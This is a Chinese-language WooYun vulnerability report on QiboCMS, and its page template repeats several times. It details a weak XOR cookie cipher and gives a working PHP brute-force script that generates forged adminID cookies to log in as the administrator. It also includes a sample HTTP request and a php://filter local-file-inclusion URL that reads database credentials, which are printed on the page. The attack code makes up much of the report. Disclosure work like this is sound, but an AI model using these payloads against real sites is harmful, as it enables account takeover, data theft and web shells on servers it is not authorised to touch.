qibocms某功能缺陷可致前台管理登录 | wooyun-2014-072994| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-072994

漏洞标题：qibocms某功能缺陷可致前台管理登录

漏洞作者： loopx9

提交时间：2014-08-19 18:08

修复时间：2014-11-14 18:10

公开时间：2014-11-14 18:10

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-19：细节已通知厂商并且等待厂商处理中
1970-01-01：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
1970-02-25：细节向核心白帽子及相关领域专家公开
1970-03-07：细节向普通白帽子公开
1970-03-17：细节向实习白帽子公开
2014-11-14：细节向公众公开

简要描述：

RT.前台管理登录，由于是通用文件，涉及多个系统。

详细说明：

0x1 前台admin登录
inc/function.inc.php:

function mymd5($string,$action="EN",$rand=''){ //字符串加密和解密 
	global $webdb;
	if($action=="DE"){//处理+号在URL传递过程中会异常
		$string = str_replace('QIBO|ADD','+',$string);
	}
    $secret_string = $webdb[mymd5].$rand.'5*j,.^&;?.%#@!'; //绝密字符串,可以任意设定 
	if(!is_string($string)){
		$string=strval($string);
	}
    if($string==="") return ""; 
    if($action=="EN") $md5code=substr(md5($string),8,10);   //截取明文的md5 hash 10位
    else{ 
        $md5code=substr($string,-10); 
        $string=substr($string,0,strlen($string)-10); 
    }
    //$key = md5($md5code.$_SERVER["HTTP_USER_AGENT"].$secret_string);
	$key = md5($md5code.$secret_string); //$md5code 随明文改变而改变，因而$key也是变化的
    $string = ($action=="EN"?$string:base64_decode($string)); 
    $len = strlen($key); 
    $code = "";
    for($i=0; $i<strlen($string); $i++){ 
        $k = $i%$len; 
        $code .= $string[$i]^$key[$k];   //按位异或
    }
    $code = ($action == "DE" ? (substr(md5($code),8,10)==$md5code?$code:NULL) : base64_encode($code)."$md5code"); //解密过程会校验md5值
	if($action=="EN"){//处理+号在URL传递过程中会异常
		$code = str_replace('+','QIBO|ADD',$code);
	}
    return $code; 
}

加密函数就是一个异或加密，参与异或的密钥是变化的，同时做了HMAC验证防止了篡改，总的来说安全性还是可以的。但函数实现HMAC的是 substr(md5($string),8,10)，即知道了明文就知道了校验码。那可不可以构造密文来利用呢？答案是可以的。由于不知道异或的密钥，只能暴力破解。异或密钥为32位md5，因而每一位就有16种可能(0-9,a-f), 那么N位明文可能的加密结果就有16的N次方种。翻代码找到一处可以利用的地方

common.inc.php: 208-213
//$_COOKIE["adminID"]是后台登录后生成的，用于前台同步登录。
if($_COOKIE["adminID"]&&$detail=mymd5($_COOKIE["adminID"],'DE',$onlineip)){  //我们构造 1'#  的密文提交
	unset($_uid,$_username,$_password);
	list($_uid,$_username,$_password)=explode("\t",$detail);  //当解密成功后，$_uid="1'#";
	$lfjdb=$db->get_one("SELECT * FROM {$pre}memberdata WHERE uid='$_uid' AND username='$_username'");//成功取到uid=1的记录，基本上就是admin
}

没有验证password，所以直接就能以admin身份登陆前台。这里我们的明文只有短短的3位(1'#),对应4096种密文。

<?php
$str = "1'#";
$key = "0123456789abcdef";
for ($i = 0; $i < strlen($key); $i++) {
    $a[] = $str[0] ^ $key[$i];
    $b[] = $str[1] ^ $key[$i];
    $c[] = $str[2] ^ $key[$i];
}
for ($i = 0; $i < 16; $i++) {
    for ($j = 0; $j < 16; $j++) {
        for ($k = 0; $k < 16; $k++) {
            $result[] = $a[$i] . $b[$j] . $c[$k];
        }
    }
}
file_exists('cookie.txt') && unlink('cookie.txt');
foreach ($result as $v)
    file_put_contents('cookie.txt', urlencode(str_replace('+', 'QIBO|ADD', base64_encode($v))) . substr(md5($str), 8, 10) . "\r\n", FILE_APPEND);
?>

最多请求4096次，还能接受。burp 跑一下也就分分钟。

GET /member/index.php HTTP/1.1
Accept: */*
Referer: http://v7.qibosoft.com/
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)
Accept-Encoding: gzip, deflate
Host: v7.qibosoft.com
Proxy-Connection: Keep-Alive
Cookie: adminID=U0QXcdb8c28d5d
X-Forwarded-For: 173.194.121.28
Connection: close

0x2 前台getshell(整站系统)
以admin登录后，编辑文章，模板选择 template/default/list.htm ,模板解析是直接require的。而 template/default/list.htm 中有一句

if($listdb_moresort){@include("$bigsortTPL");}

$listdb_moresort 和 $bigsortTPL 都可以通过$_GET、$_POST注册。于是可以文件包含了。

漏洞证明：

http://v7.qibosoft.com/bencandy.php?fid=3&id=665&listdb_moresort=1&bigsortTPL=php://filter/read=convert.base64-encode/resource=data/config.php

成功读取data/mysql_config.php

<?php
/**
* 以下变量需根据您的服务器说明档修改
*/
$dbhost = 'localhost';          // 数据库服务器(一般不必改)
$dbuser = 'v7';                 // 数据库用户名
$dbpw = 'v7v7';                                 // 数据库密码
$dbname = 'v7';                         // 数据库名
$pre='qibosoft_';                               // 网站表区分符
$database = 'mysql';            // 数据库类型(一般不必改)
$pconnect = 0;                          // 数据库是否持久连接(一般不必改)
$dbcharset = '';                // 数据库编码,如果出现网页乱码,你可以尝试改为gbk或latin1或utf8或big5,即可解决
        ?>

由于url_allow_include=Off，RFI变LFI。只能传个图片然后本地包含。官方demo已shell:

修复方案：

加强消息验证码复杂度，比如引入$webdb[mymd5].

版权声明：转载请注明来源 loopx9@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-11-14 18:10

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-072994

漏洞标题：qibocms某功能缺陷可致前台管理登录

相关厂商：齐博CMS

漏洞作者： loopx9

提交时间：2014-08-19 18:08

修复时间：2014-11-14 18:10

公开时间：2014-11-14 18:10

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 loopx9@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-072994

漏洞标题：qibocms某功能缺陷可致前台管理登录

相关厂商：齐博CMS

漏洞作者： loopx9

提交时间：2014-08-19 18:08

修复时间：2014-11-14 18:10

公开时间：2014-11-14 18:10

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-072994"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 loopx9@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：